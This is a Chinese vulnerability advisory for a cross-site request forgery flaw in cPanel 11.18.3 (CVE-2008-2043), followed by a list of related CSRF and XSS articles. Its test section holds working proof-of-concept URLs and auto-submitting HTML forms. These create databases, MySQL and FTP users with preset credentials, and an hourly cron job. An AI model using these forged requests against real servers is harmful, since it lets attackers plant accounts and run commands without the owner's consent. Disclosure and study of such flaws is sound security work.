cPanel跨站请求伪造漏洞

简介: 发布日期:2008-04-28更新日期:2008-05-05受影响系统: cPanel cPanel 11.18.3 build ID 21703描述: CVE(CAN) ID: CVE-2008-2043cPanel是基于web的工具,用于自动化控制网站和服务器。
发布日期:2008-04-28
更新日期:2008-05-05

受影响系统:
cPanel cPanel 11.18.3 build ID 21703
描述:
CVE(CAN) ID: CVE-2008-2043

cPanel是基于web的工具,用于自动化控制网站和服务器。

cPanel没有验证用户通过HTTP请求所执行的某些操作,这允许远程攻击者通过跨站请求伪造(XSRF)攻击执行仅有管理员才可以执行的操作,包括创建新的数据库、添加新用户等。

<*来源:Rook Security
  
  链接: http://secunia.com/advisories/30027/
         http://www.kb.cert.org/vuls/id/584089
         http://www.rooksecurity.com/blog/?p=7
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

创建数据库:
http://localhost:2082/frontend/x2/sql/adddb.html?db=database_name

创建新的mysql用户:
http://localhost:2082/frontend/x2/sql/adduser.html?user=badmin&pass=badmin

添加ftp用户:
<html>
<form id=1 method=’post’ action=’ http://localhost:2082/frontend/x2/ftp/doaddftp.html’>
<input name=’login’ value=’badmin’>
<input name=’password’ value=’badmin’>
<input name=’quota’ value=’unlimited’>
<input name=’homedir’ value=’/badmin’>
</form>
</html>
<script>
document.getElementById(1).submit();
</script>

每小时运行一次命令行:
<html>
<form id=2 method=’post’ action=’ http://localhost:2082/frontend/x2/cron/editcronsimple.html’>
<input name=’command1′ value=’echo test’>
<input name=’mailto’ value=’junk_address’>
<input name=’minute1′ value=’0′>
<input name=’hour1′ value=’*'>
<input name=’day1′ value=’*'>
<input name=’weekday1′ value=’*'>
<input name=’month1′ value=’*'>
</form>
</html>
<script>
document.getElementById(2).submit();
</script>

目录
相关文章
|
6天前
|
安全 数据安全/隐私保护
第二轮学习笔记:CSRF跨站请求伪造漏洞
第二轮学习笔记:CSRF跨站请求伪造漏洞
16 0
|
6天前
|
存储 安全 JavaScript
HW常见攻击方式 --XSS跨站脚本攻击
HW常见攻击方式 --XSS跨站脚本攻击
50 0
|
8月前
|
数据安全/隐私保护
CSRF(跨站请求伪造)
CSRF(跨站请求伪造)
77 0
|
存储 JavaScript 安全
跨站脚本攻击(XSS)和跨站请求伪造(CSRF)是什么?区别是什么?底层原理是什么?
跨站脚本攻击(XSS)和跨站请求伪造(CSRF)是什么?区别是什么?底层原理是什么?
548 0
XSRF CRFS(跨站请求伪造,单点登录攻击) 特点和原理
概念:跨站请求伪造(英语:Cross-site request forgery),也被称为 one-click attack 或者 session riding,通常缩写为 CSRF 或者 XSRF, 是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法。跟跨网站脚本(XSS)相比,XSS 利用的是用户对指定网站的信任,CSRF 利用的是网站对用户网页浏览器的信任。
XSRF CRFS(跨站请求伪造,单点登录攻击) 特点和原理
|
机器学习/深度学习 安全 程序员
网络安全-跨站请求伪造(CSRF)的原理、攻击及防御
网络安全-跨站请求伪造(CSRF)的原理、攻击及防御
145 0
网络安全-跨站请求伪造(CSRF)的原理、攻击及防御
|
存储 SQL Web App开发
xss跨站请求攻击
反射型xss攻击( Reflected XSS)又称为非持久性跨站点脚本攻击,它是最常见的类型的XSS。漏洞产生的原因是攻击者注入的数据反映在响应中。一个典型的非持久性XSS包含一个带XSS攻击向量的链接(即每次攻击需要用户的点击)。
什么是CSRF(跨站请求伪造)?
什么是CSRF(跨站请求伪造)?
289 0
什么是CSRF(跨站请求伪造)?
|
Web App开发 安全
Web安全系列(二):XSS 攻击进阶(初探 XSS Payload)
上一章我谈到了 XSS 攻击的几种分类以及形成的攻击的原理,并举了一些浅显的例子,接下来,我就阐述什么叫做 `XSS Payload` 以及从攻击者的角度来初探 XSS 攻击的威力。
2971 0
|
安全
安全漏洞问题4:跨站请求伪造
跨站请求伪造(CSRF)是一种挟制终端用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法。攻击者只要借助少许的社会工程诡计,例如通过电子邮件或者是聊天软件发送的链接,攻击者就能迫使一个Web应用程序的用户去执行攻击者选择的操作。
2631 0